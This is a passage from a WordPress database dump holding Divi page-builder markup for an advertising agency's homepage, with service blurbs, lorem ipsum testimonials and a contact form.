animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever.\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Easy to start</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-216\">\n<p><strong><em>Just three steps</em></strong></p>\n<p><strong><em></em></strong></p>\n</div>\n<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-217\">\n<p>We had adopted proven workflow to produce consistent result, but never hesitate to cross the lines and work differently.</p>\n</div>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"01. BRAND AUDIT\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<p style=\"text-align: center;\"><span>Analyzing the brand with all the key parameter (As per operating environment and competition)</span></p>[/et_pb_blurb][et_pb_blurb title=\"03. EXECUTION\" use_icon=\"on\" font_icon=\"%%32%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<p style=\"text-align: center;\"><span>Creative Development, Setting up the visual identity, implementing the IMC(Integrated Marketing Communication)</span></p>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"02. STRATEGY\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||56px|21px||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<p><span>Starting with the summary of the plan, Defining TG, Writing/Creating USP</span></p>[/et_pb_blurb][et_pb_blurb title=\"04. EVALUATION\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"|||21px||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<p><span>Starting with the summary of the plan, Defining TG, Writing/Creating USP</span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-06.jpg\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_padding=\"110px||110px|\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.4.9\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" fullwidth_field=\"on\" _builder_version=\"4.4.9\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2020-07-08 21:25:36','2020-07-08 21:25:36','',134,'https://52.66.212.87/2020/07/08/134-revision-v1/',0,'revision','',0);
INSERT INTO `wp_posts` VALUES (284,1,'2020-07-08 21:25:57','2020-07-08 21:25:57','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.4.9\" background_color=\"#fcd21d\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/Desktop-HD.png\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_margin=\"|auto|1px|auto||\" custom_padding=\"50px||50px|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>[/et_pb_text][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.9\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"zoom\" animation_duration=\"1200ms\" box_shadow_style=\"preset2\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Service Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"56px||110px|||\" custom_padding_tablet=\"20px||||false|false\" custom_padding_phone=\"12px||40px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.4.9\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU&t=5s\" image_src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-01.jpg\" _builder_version=\"4.4.9\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" 